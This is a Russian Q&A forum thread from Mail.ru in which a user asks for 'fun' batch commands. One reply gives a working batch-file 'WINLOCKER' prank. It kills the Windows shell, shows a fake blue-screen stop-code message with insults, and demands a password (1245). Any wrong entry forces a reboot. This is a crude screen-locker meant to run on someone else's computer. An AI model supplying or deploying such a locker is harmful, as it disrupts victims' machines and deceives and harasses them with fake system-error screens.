Mail.ruПочтаМой МирОдноклассникиВКонтактеИгрыЗнакомстваНовостиПоискОблакоVK ComboВсе проекты

Скажите прикольные команды для бат

wdadadawa dsazxdzczxc Ученик (18), закрыт 4 недели назад
Скажите прикольные команды для бат
Лучший ответ
Алекс Куха Высший разум (418410) 2 месяца назад
Тот синтаксис сам по себе прикольный. Весь
Остальные ответы
Иессив Просветленный (38061) 2 месяца назад
@echo off

Taskkill/f /im explorer.exe

Title WINLOCKER

color 4



echo error

echo 0000000x00000000000)))))error echo system 32:0000000x000120)))(

echo Technical Information:


echo * STOP: 0x1000007e

echo (0xffffffffc0000005,

echo 0xfffff80002e55151,

echo 0xfffff880009a99d8,

echo 0xfffff880009a9230)

echo * xNtKrnl.exe - Address

echo 0xfffff80002e55151 base at echo 0xfffff80002e0d000 DateStamp

echo 0x4ce7951a

echo Ty loxoped


:h

set/p x=

if %x%==1245 (echo win start

start explorer

exit

) else (

echo Poka lox!

shutdown /r

)

goto h